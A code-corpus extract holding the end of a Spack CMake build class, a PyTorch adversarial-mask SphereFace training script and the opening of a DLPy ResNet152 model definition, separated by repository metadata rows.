            build_type = 'RelWithDebInfo'

        args = [
            '-G', generator,
            '-DCMAKE_INSTALL_PREFIX:PATH={0}'.format(pkg.prefix),
            '-DCMAKE_BUILD_TYPE:STRING={0}'.format(build_type),
            '-DCMAKE_VERBOSE_MAKEFILE:BOOL=ON'
        ]

        if platform.mac_ver()[0]:
            # On macOS prefer plain libraries over frameworks/app bundles.
            args.extend([
                '-DCMAKE_FIND_FRAMEWORK:STRING=LAST',
                '-DCMAKE_FIND_APPBUNDLE:STRING=LAST'
            ])

        # Set up CMake rpath
        args.append('-DCMAKE_INSTALL_RPATH_USE_LINK_PATH:BOOL=FALSE')
        rpaths = ';'.join(spack.build_environment.get_rpaths(pkg))
        args.append('-DCMAKE_INSTALL_RPATH:STRING={0}'.format(rpaths))
        # CMake's find_package() looks in CMAKE_PREFIX_PATH first, help CMake
        # to find immediate link dependencies in right places:
        deps = [d.prefix for d in
                pkg.spec.dependencies(deptype=('build', 'link'))]
        deps = filter_system_paths(deps)
        args.append('-DCMAKE_PREFIX_PATH:STRING={0}'.format(';'.join(deps)))
        return args

    def flags_to_build_system_args(self, flags):
        """Produces a list of all command line arguments to pass the specified
        compiler flags to cmake. Note CMAKE does not have a cppflags option,
        so cppflags will be added to cflags, cxxflags, and fflags to mimic the
        behavior in other tools."""
        # Has to be dynamic attribute due to caching
        setattr(self, 'cmake_flag_args', [])
        flag_string = '-DCMAKE_{0}_FLAGS={1}'
        langs = {'C': 'c', 'CXX': 'cxx', 'Fortran': 'f'}

        # Handle language compiler flags
        for lang, pre in langs.items():
            flag = pre + 'flags'
            # cmake has no explicit cppflags support -> add it to all langs
            lang_flags = ' '.join(flags.get(flag, []) + flags.get('cppflags',
                                                                  []))
            if lang_flags:
                self.cmake_flag_args.append(flag_string.format(lang,
                                                               lang_flags))

        # Cmake has different linker arguments for different build types.
        # We specify for each of them.
        if flags['ldflags']:
            ldflags = ' '.join(flags['ldflags'])
            ld_string = '-DCMAKE_{0}_LINKER_FLAGS={1}'
            # cmake has separate linker arguments for types of builds.
            for type in ['EXE', 'MODULE', 'SHARED', 'STATIC']:
                self.cmake_flag_args.append(ld_string.format(type, ldflags))

        # CMake has libs options separated by language. Apply ours to each.
        if flags['ldlibs']:
            libs_flags = ' '.join(flags['ldlibs'])
            libs_string = '-DCMAKE_{0}_STANDARD_LIBRARIES={1}'
            for lang in langs:
                self.cmake_flag_args.append(libs_string.format(lang,
                                                               libs_flags))

    @property
    def build_directory(self):
        """Returns the directory to use when building the package

        :return: directory where to build the package
        """
        return os.path.join(self.stage.source_path, 'spack-build')

    def cmake_args(self):
        """Produces a list containing all the arguments that must be passed to
        cmake, except:

            * CMAKE_INSTALL_PREFIX
            * CMAKE_BUILD_TYPE

        which will be set automatically.

        :return: list of arguments for cmake
        """
        return []

    def cmake(self, spec, prefix):
        """Runs ``cmake`` in the build directory"""
        options = [os.path.abspath(self.root_cmakelists_dir)]
        options += self.std_cmake_args
        options += self.cmake_args()
        with working_dir(self.build_directory, create=True):
            inspect.getmodule(self).cmake(*options)

    def build(self, spec, prefix):
        """Make the build targets"""
        with working_dir(self.build_directory):
            if self.generator == 'Unix Makefiles':
                inspect.getmodule(self).make(*self.build_targets)
            elif self.generator == 'Ninja':
                inspect.getmodule(self).ninja(*self.build_targets)

    def install(self, spec, prefix):
        """Make the install targets"""
        with working_dir(self.build_directory):
            if self.generator == 'Unix Makefiles':
                inspect.getmodule(self).make(*self.install_targets)
            elif self.generator == 'Ninja':
                inspect.getmodule(self).ninja(*self.install_targets)

    # Run the registered build-time test callbacks (i.e. check) after build.
    run_after('build')(PackageBase._run_default_build_time_test_callbacks)

    def check(self):
        """Searches the CMake-generated Makefile for the target ``test``
        and runs it if found.
        """
        with working_dir(self.build_directory):
            if self.generator == 'Unix Makefiles':
                self._if_make_target_execute('test',
                                             jobs_env='CTEST_PARALLEL_LEVEL')
                self._if_make_target_execute('check')
            elif self.generator == 'Ninja':
                self._if_ninja_target_execute('test',
                                              jobs_env='CTEST_PARALLEL_LEVEL')
                self._if_ninja_target_execute('check')

    # Check that self.prefix is there after installation
    run_after('install')(PackageBase.sanity_check_prefix)
| 39.562249 | 78 | 0.587453 |
acdfa6a302f587b880a364dfdcfc570bbfad9118 | 9,509 | py | Python | train.py | amands97/adverserialSphereFace | 91832c4af6768bfa4b116646d09135d98ce727f6 | [
"MIT"
] | null | null | null | train.py | amands97/adverserialSphereFace | 91832c4af6768bfa4b116646d09135d98ce727f6 | [
"MIT"
] | null | null | null | train.py | amands97/adverserialSphereFace | 91832c4af6768bfa4b116646d09135d98ce727f6 | [
"MIT"
] | null | null | null | # CUDA_VISIBLE_DEVICES=2 python train.py --datase CASIA-WebFace.zip --bs 256
from __future__ import print_function
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.autograd import Variable
torch.backends.cudnn.bencmark = True
import os,sys
import cv2
import random,datetime
import argparse
import numpy as np
np.warnings.filterwarnings('ignore')
from dataset import ImageDataset
from matlab_cp2tform import get_similarity_transform_for_cv2
import net_sphere
import adversary
from gumbel import gumbel_softmax
from torch.nn.functional import conv2d # for the kernel
from torch.utils.tensorboard import SummaryWriter
# Command-line interface and module-level training state.
parser = argparse.ArgumentParser(description='PyTorch sphereface')
parser.add_argument('--net','-n', default='sphere20a', type=str)
parser.add_argument('--dataset', default='../../dataset/face/casia/casia.zip', type=str)
parser.add_argument('--lr', default=0.1, type=float, help='learning rate')
parser.add_argument('--bs', default=256, type=int, help='')
parser.add_argument('--checkpoint', default=-1, type=int, help='if use checkpoint then mention the number, otherwise training from scratch')
args = parser.parse_args()
use_cuda = torch.cuda.is_available()
# TensorBoard writer and global step counter shared with train().
writer = SummaryWriter()
n_iter = 0
def alignment(src_img, src_pts):
    """Warp a face image so its five landmarks land on the canonical
    reference positions, returning a (100, 116) aligned crop."""
    margin = 2  # extra border kept around the standard 96x112 face crop
    ref_pts = [[30.2946 + margin, 51.6963 + margin],
               [65.5318 + margin, 51.5014 + margin],
               [48.0252 + margin, 71.7366 + margin],
               [33.5493 + margin, 92.3655 + margin],
               [62.7299 + margin, 92.2041 + margin]]
    crop_size = (96 + margin * 2, 112 + margin * 2)
    source = np.array(src_pts).astype(np.float32)
    reference = np.array(ref_pts).astype(np.float32)
    # Similarity transform mapping detected landmarks onto the references.
    tfm = get_similarity_transform_for_cv2(source, reference)
    return cv2.warpAffine(src_img, tfm, crop_size)
def dataset_load(name, filename, pindex, cacheobj, zfile):
    """Decode one sample from the zipped dataset.

    ``filename`` looks like ``<archive>.zip:<member>`` followed by
    tab-separated fields: the class id and five landmark (x, y) pairs.
    Returns ``(img, label)``: a normalized (1, 3, 112, 96) image array and
    a (1, 1) float32 array holding the class id.
    """
    position = filename.rfind('.zip:')
    # NOTE(review): zipfilename is computed but never used below.
    zipfilename = filename[0:position+4]
    nameinzip = filename[position+5:]
    split = nameinzip.split('\t')
    nameinzip = split[0]
    classid = int(split[1])
    # Five (x, y) facial landmarks follow the class id.
    src_pts = []
    for i in range(5):
        src_pts.append([int(split[2*i+2]), int(split[2*i+3])])
    data = np.frombuffer(zfile.read(nameinzip), np.uint8)
    img = cv2.imdecode(data, 1)
    img = alignment(img, src_pts)
    if ':train' in name:
        # Training augmentation: random horizontal flip ...
        if random.random() > 0.5: img = cv2.flip(img, 1)
        # ... and a random crop within the extra 2px border, otherwise the
        # deterministic center crop.
        if random.random() > 0.5:
            rx = random.randint(0, 2*2)
            ry = random.randint(0, 2*2)
            img = img[ry:ry+112, rx:rx+96, :]
        else:
            img = img[2:2+112, 2:2+96, :]
    else:
        # Evaluation: always the center crop.
        img = img[2:2+112, 2:2+96, :]
    # HWC -> (1, C, H, W), then scale pixel values to roughly [-1, 1].
    img = img.transpose(2, 0, 1).reshape((1, 3, 112, 96))
    img = (img - 127.5) / 128.0
    label = np.zeros((1, 1), np.float32)
    label[0, 0] = classid
    return (img, label)
def printoneline(*argv):
    """Overwrite the current console line with the space-joined arguments.

    Writes a carriage return followed by ``str(arg)`` for each argument,
    separated by single spaces, then flushes so progress appears
    immediately (used as an in-place progress display).
    """
    # ' '.join replaces the original quadratic ``+=`` concatenation and
    # trailing-character slice; output is byte-identical.
    line = ' '.join(str(arg) for arg in argv)
    sys.stdout.write('\r' + line)
    sys.stdout.flush()
def save_model(model, filename):
    """Write ``model``'s state dict to ``filename`` with every tensor
    cloned onto the CPU, so the checkpoint loads on any machine."""
    snapshot = model.state_dict()
    # Replace each (possibly GPU) tensor with a detached CPU copy in place.
    for name in snapshot:
        snapshot[name] = snapshot[name].clone().cpu()
    torch.save(snapshot, filename)
def dt():
    """Return the current wall-clock time as an ``HH:MM:SS`` string."""
    # format() delegates to datetime.__format__, i.e. strftime semantics.
    return format(datetime.datetime.now(), '%H:%M:%S')
def getKernel():
    """Build the 3x3 Laplacian kernel used for the mask compactness loss.

    The kernel is 1.0 at the centre and -1/8 elsewhere (a negated,
    normalized Laplacian), so its entries sum to zero. It is returned as a
    float32 tensor of shape (1, 1, 3, 3), ready for ``conv2d`` over a
    single-channel mask.
    """
    # https://discuss.pytorch.org/t/setting-custom-kernel-for-cnn-in-pytorch/27176/2
    kernel = torch.ones((3, 3))
    kernel[1, 1] = -8
    kernel = (kernel / -8).type(torch.FloatTensor)
    # One input channel: repeating once yields shape (out=1, in=1, 3, 3).
    # (The original also computed unused b/h/w locals; removed.)
    channels = 1
    return kernel.repeat(channels, 1, 1, 1)
def train(epoch, args):
    """Run one adversarial training epoch.

    For every batch two updates are performed: first the mask network is
    stepped to *hurt* classification while keeping the mask compact
    (Laplacian term) and sparse (L1 term); then the feature and FC networks
    are stepped to classify through the masked features. Uses the
    module-level nets, optimizers, criteria, ``writer``, ``laplacianKernel``
    and the global step counter ``n_iter``.
    """
    featureNet.train()
    maskNet.train()
    fcNet.train()
    train_loss = 0
    classification_loss = 0
    correct = 0
    total = 0
    batch_idx = 0
    ds = ImageDataset(args.dataset, dataset_load, 'data/casia_landmark.txt', name=args.net+':train',
                      bs=args.bs, shuffle=True, nthread=6, imagesize=128)
    global n_iter
    while True:
        if batch_idx % 100 == 0:
            print(batch_idx)
        # NOTE(review): this second print fires every batch, making the
        # guard above redundant -- looks like leftover debugging output.
        print(batch_idx)
        n_iter += 1
        img, label = ds.get()
        if img is None: break  # dataset exhausted -> end of epoch
        inputs = torch.from_numpy(img).float()
        targets = torch.from_numpy(label[:, 0]).long()
        if use_cuda: inputs, targets = inputs.cuda(), targets.cuda()
        optimizerMask.zero_grad()
        inputs, targets = Variable(inputs), Variable(targets)
        # Forward pass: features -> gumbel-sampled mask -> masked features.
        features = featureNet(inputs)
        mask = maskNet(features)
        mask = gumbel_softmax(mask)
        maskedFeatures = torch.mul(mask, features)
        outputs = fcNet(maskedFeatures)
        outputs1 = outputs[0]  # 0=cos_theta 1=phi_theta
        _, predicted = torch.max(outputs1.data, 1)
        total += targets.size(0)
        correct += predicted.eq(targets.data).cpu().sum()
        # --- adversary (mask network) update ---
        lossAdv = criterion(outputs, targets)
        # Laplacian response of the mask penalizes non-compact masks.
        lossCompact = torch.sum(conv2d(mask, laplacianKernel, stride=1, groups=1))
        # L1 distance to an all-ones mask keeps the mask sparse.
        if use_cuda:
            lossSize = F.l1_loss(mask, target=torch.ones(mask.size()).cuda(), size_average=False)
        else:
            lossSize = F.l1_loss(mask, target=torch.ones(mask.size()), size_average=False)
        writer.add_scalar('Loss/adv-classification', - criterion2(outputs1, targets)/100, n_iter)
        writer.add_scalar('Loss/adv-compactness', lossCompact/1000000, n_iter)
        writer.add_scalar('Loss/adv-size', lossSize/10000, n_iter)
        # The classification term enters negated: the mask is adversarial.
        loss = - criterion2(outputs1, targets)/100 + lossCompact/1000000 + lossSize/10000
        writer.add_scalar('Accuracy/adv-totalLoss', loss, n_iter)
        lossd = loss.data
        # retain_graph so the classifier backward below can reuse the graph.
        loss.backward(retain_graph=True)
        optimizerMask.step()
        # --- classifier (feature + FC) update ---
        optimizerFC.zero_grad()
        lossC = criterion(outputs, targets)
        lossClassification = lossC.data
        lossC.backward()
        optimizerFC.step()
        classification_loss += lossClassification
        train_loss += loss.data
        writer.add_scalar('Loss/classn-loss', classification_loss/(batch_idx + 1), n_iter)
        writer.add_scalar('Loss/adv-avgloss', train_loss/(batch_idx + 1), n_iter)
        writer.add_scalar('Accuracy/classification', 100* correct/total, n_iter)
        writer.add_scalar('Accuracy/correct', correct, n_iter)
        batch_idx += 1
    print('')
# --- model construction --------------------------------------------------
if args.checkpoint == -1:
    # Fresh start: feature extractor and FC head initialized from the
    # pretrained sphereface weights; mask network starts from scratch.
    featureNet = getattr(net_sphere, args.net)()
    featureNet.load_state_dict(torch.load('model/sphere20a_20171020.pth'))
    maskNet = getattr(adversary, "MaskMan")(512)
    fcNet = getattr(net_sphere, "fclayers")()
    pretrainedDict = torch.load('model/sphere20a_20171020.pth')
    # Keep only the pretrained entries that belong to the FC head.
    fcDict = {k: pretrainedDict[k] for k in pretrainedDict if k in fcNet.state_dict()}
    fcNet.load_state_dict(fcDict)
    laplacianKernel = getKernel()
else:
    # Resume: all three networks come from the numbered checkpoint files.
    featureNet = getattr(net_sphere, args.net)()
    featureNet.load_state_dict(torch.load('saved_models_ce/featureNet_' + str(args.checkpoint) + '.pth'))
    maskNet = getattr(adversary, "MaskMan")(512)
    maskNet.load_state_dict(torch.load('saved_models_ce/maskNet_' + str(args.checkpoint) + '.pth'))
    fcNet = getattr(net_sphere, "fclayers")()
    fcNet.load_state_dict(torch.load('saved_models_ce/fcNet_' + str(args.checkpoint) + '.pth'))
    laplacianKernel = getKernel()

if use_cuda:
    featureNet.cuda()
    maskNet.cuda()
    fcNet.cuda()
    laplacianKernel = laplacianKernel.cuda()

criterion = net_sphere.AngleLoss()
# The mask network uses a much smaller learning rate than the classifier.
optimizerFC = optim.SGD(list(featureNet.parameters()) + list(fcNet.parameters()), lr=args.lr, momentum=0.9, weight_decay=5e-4)
optimizerMask = optim.SGD(maskNet.parameters(), lr=args.lr/1000, momentum=0.9, weight_decay=5e-4)
criterion2 = torch.nn.CrossEntropyLoss()

print('start: time={}'.format(dt()))
for epoch in range(0, 50):
    # LR schedule: decay by 10x at epochs 10, 15 and 18 and rebuild both
    # optimizers with the new rate.
    if epoch in [0, 10, 15, 18]:
        if epoch != 0: args.lr *= 0.1
        optimizerFC = optim.SGD(list(featureNet.parameters()) + list(fcNet.parameters()), lr=args.lr, momentum=0.9, weight_decay=5e-4)
        optimizerMask = optim.SGD(maskNet.parameters(), lr=args.lr/10000, momentum=0.9, weight_decay=5e-4)
        # slowed the lr even more
    # Skip epochs already covered by the loaded checkpoint.
    if args.checkpoint >= epoch:
        continue
    train(epoch, args)
    save_model(featureNet, 'saved_models_ce/featureNet_{}.pth'.format(epoch))
    save_model(maskNet, 'saved_models_ce/maskNet_{}.pth'.format(epoch))
    save_model(fcNet, 'saved_models_ce/fcNet_{}.pth'.format(epoch))
print('finish: time={}\n'.format(dt()))
acdfa78bafb49f868d8922f526e0872e5f0da250 | 120,006 | py | Python | dlpy/caffe_models/model_resnet152.py | arharvey918/python-dlpy | 423985ebe65acbcbe9a7996bb26aee5e66eddc49 | [
"Apache-2.0"
] | 1 | 2018-08-27T15:10:11.000Z | 2018-08-27T15:10:11.000Z | dlpy/caffe_models/model_resnet152.py | arharvey918/python-dlpy | 423985ebe65acbcbe9a7996bb26aee5e66eddc49 | [
"Apache-2.0"
] | null | null | null | dlpy/caffe_models/model_resnet152.py | arharvey918/python-dlpy | 423985ebe65acbcbe9a7996bb26aee5e66eddc49 | [
"Apache-2.0"
] | 1 | 2019-09-19T15:59:26.000Z | 2019-09-19T15:59:26.000Z | #!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from ..utils import input_table_check
def ResNet152_Model(s, model_table='RESNET152', n_channels=3, width=224, height=224,
random_crop=None, offsets=None,
random_flip=None, random_mutation=None,
reshape_after_input=None):
'''
ResNet152 model definition
Parameters
----------
s : CAS
Specifies the CAS connection object
model_table : string, dict or CAS table, optional
Specifies the CAS table to store the model.
n_channels : int, optional
Specifies the number of the channels of the input layer
Default: 3
width : int, optional
Specifies the width of the input layer
Default: 224
height : int, optional
Specifies the height of the input layer
Default: 224
random_crop : string, optional
Specifies how to crop the data in the input layer when image data is
used. Images are cropped to the values that are specified in the width
and height parameters.deepLearn. Only the images with one or both dimensions
that are larger than those sizes are cropped.
Valid Values: 'none', 'unique', 'randomresized', 'resizethencrop'
offsets : double or iter-of-doubles, optional
Specifies an offset for each channel in the input data. The final
input data is set after applying scaling and subtracting the
specified offsets.deepLearn.
Default: (103.939, 116.779, 123.68)
random_flip : string, optional
Specifies how to flip the data in the input layer when image data is
used. Approximately half of the input data is subject to flipping.
Valid Values: 'h', 'hv', 'v', 'none'
random_mutation : string, optional
Specifies how to apply data augmentations/mutations to the data in the input layer.
Valid Values: 'none', 'random'
reshape_after_input : Layer Reshape, optional
Specifies whether to add a reshape layer after the input layer.
Returns
-------
None
A CAS table defining the model is created
'''
model_table_opts = input_table_check(model_table)
# quick error-checking and default setting
if offsets is None:
offsets = [103.939, 116.779, 123.68]
# instantiate model
s.deepLearn.buildModel(model=dict(replace=True, **model_table_opts), type='CNN')
# input layer
s.deepLearn.addLayer(model=model_table_opts, name='data',
layer=dict(type='input', nchannels=n_channels, width=width, height=height,
randomcrop=random_crop, offsets=offsets,
randomFlip=random_flip, randomMutation=random_mutation))
input_data_layer = 'data'
if reshape_after_input is not None:
input_data_layer = 'reshape1'
s.deepLearn.addLayer(model=model_table_opts, name='reshape1',
layer=dict(type='reshape', **reshape_after_input.config),
srcLayers=['data'])
# -------------------- Layer 1 ----------------------
# conv1 layer: 64 channels, 7x7 conv, stride=2; output = 112 x 112 */
s.deepLearn.addLayer(model=model_table_opts, name='conv1',
layer=dict(type='convolution', nFilters=64, width=7, height=7,
stride=2, act='identity'),
srcLayers=[input_data_layer])
# conv1 batch norm layer: 64 channels, output = 112 x 112 */
s.deepLearn.addLayer(model=model_table_opts, name='bn_conv1',
layer=dict(type='batchnorm', act='relu'), srcLayers=['conv1'])
# pool1 layer: 64 channels, 3x3 pooling, output = 56 x 56 */
s.deepLearn.addLayer(model=model_table_opts, name='pool1',
layer=dict(type='pooling', width=3, height=3, stride=2, pool='max'),
srcLayers=['bn_conv1'])
# ------------------- Residual Layer 2A -----------------------
# res2a_branch1 layer: 256 channels, 1x1 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2a_branch1',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['pool1'])
# res2a_branch1 batch norm layer: 256 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2a_branch1',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res2a_branch1'])
# res2a_branch2a layer: 64 channels, 1x1 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2a_branch2a',
layer=dict(type='convolution', nFilters=64, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['pool1'])
# res2a_branch2a batch norm layer: 64 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2a_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res2a_branch2a'])
# res2a_branch2b layer: 64 channels, 3x3 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2a_branch2b',
layer=dict(type='convolution', nFilters=64, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn2a_branch2a'])
# res2a_branch2b batch norm layer: 64 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2a_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res2a_branch2b'])
# res2a_branch2c layer: 256 channels, 1x1 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2a_branch2c',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn2a_branch2b'])
# res2a_branch2c batch norm layer: 256 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2a_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res2a_branch2c'])
# res2a residual layer: 256 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2a',
layer=dict(type='residual', act='relu'),
srcLayers=['bn2a_branch2c', 'bn2a_branch1'])
# ------------------- Residual Layer 2B -----------------------
# res2b_branch2a layer: 64 channels, 1x1 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2b_branch2a',
layer=dict(type='convolution', nFilters=64, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res2a'])
# res2b_branch2a batch norm layer: 64 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2b_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res2b_branch2a'])
# res2b_branch2b layer: 64 channels, 3x3 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2b_branch2b',
layer=dict(type='convolution', nFilters=64, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn2b_branch2a'])
# res2b_branch2b batch norm layer: 64 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2b_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res2b_branch2b'])
# res2b_branch2c layer: 256 channels, 1x1 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2b_branch2c',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn2b_branch2b'])
# res2b_branch2c batch norm layer: 256 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2b_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res2b_branch2c'])
# res2b residual layer: 256 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2b',
layer=dict(type='residual', act='relu'),
srcLayers=['bn2b_branch2c', 'res2a'])
# ------------------- Residual Layer 2C -----------------------
# res2c_branch2a layer: 64 channels, 1x1 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2c_branch2a',
layer=dict(type='convolution', nFilters=64, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res2b'])
# res2c_branch2a batch norm layer: 64 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2c_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res2c_branch2a'])
# res2c_branch2b layer: 64 channels, 3x3 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2c_branch2b',
layer=dict(type='convolution', nFilters=64, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn2c_branch2a'])
# res2c_branch2b batch norm layer: 64 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2c_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res2c_branch2b'])
# res2c_branch2c layer: 256 channels, 1x1 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2c_branch2c',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn2c_branch2b'])
# res2c_branch2c batch norm layer: 256 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2c_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res2c_branch2c'])
# res2c residual layer: 256 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2c',
layer=dict(type='residual', act='relu'),
srcLayers=['bn2c_branch2c', 'res2b'])
# ------------- Layer 3A --------------------
# res3a_branch1 layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3a_branch1',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=2, includebias=False, act='identity'),
srcLayers=['res2c'])
# res3a_branch1 batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3a_branch1',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3a_branch1'])
# res3a_branch2a layer: 128 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3a_branch2a',
layer=dict(type='convolution', nFilters=128, width=1, height=1,
stride=2, includebias=False, act='identity'),
srcLayers=['res2c'])
# res3a_branch2a batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3a_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3a_branch2a'])
# res3a_branch2b layer: 128 channels, 3x3 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3a_branch2b',
layer=dict(type='convolution', nFilters=128, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3a_branch2a'])
# res3a_branch2b batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3a_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3a_branch2b'])
# res3a_branch2c layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3a_branch2c',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3a_branch2b'])
# res3a_branch2c batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3a_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3a_branch2c'])
# res3a residual layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3a',
layer=dict(type='residual', act='relu'),
srcLayers=['bn3a_branch2c', 'bn3a_branch1'])
# ------------------- Residual Layer 3B1 -----------------------
# res3b1_branch2a layer: 128 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b1_branch2a',
layer=dict(type='convolution', nFilters=128, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res3a'])
# res3b1_branch2a batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b1_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b1_branch2a'])
# res3b1_branch2b layer: 128 channels, 3x3 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b1_branch2b',
layer=dict(type='convolution', nFilters=128, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b1_branch2a'])
# res3b1_branch2b batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b1_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b1_branch2b'])
# res3b1_branch2c layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b1_branch2c',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b1_branch2b'])
# res3b1_branch2c batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b1_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3b1_branch2c'])
# res3b1 residual layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b1',
layer=dict(type='residual', act='relu'),
srcLayers=['bn3b1_branch2c', 'res3a'])
# ------------------- Residual Layer 3B2 -----------------------
# res3b2_branch2a layer: 128 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b2_branch2a',
layer=dict(type='convolution', nFilters=128, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res3b1'])
# res3b2_branch2a batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b2_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b2_branch2a'])
# res3b2_branch2b layer: 128 channels, 3x3 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b2_branch2b',
layer=dict(type='convolution', nFilters=128, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b2_branch2a'])
# res3b2_branch2b batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b2_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b2_branch2b'])
# res3b2_branch2c layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b2_branch2c',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b2_branch2b'])
# res3b2_branch2c batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b2_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3b2_branch2c'])
# res3b2 residual layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b2',
layer=dict(type='residual', act='relu'),
srcLayers=['bn3b2_branch2c', 'res3b1'])
# ------------------- Residual Layer 3B3 -----------------------
# res3b3_branch2a layer: 128 channels, 1x1 conv, output = 28 x 28
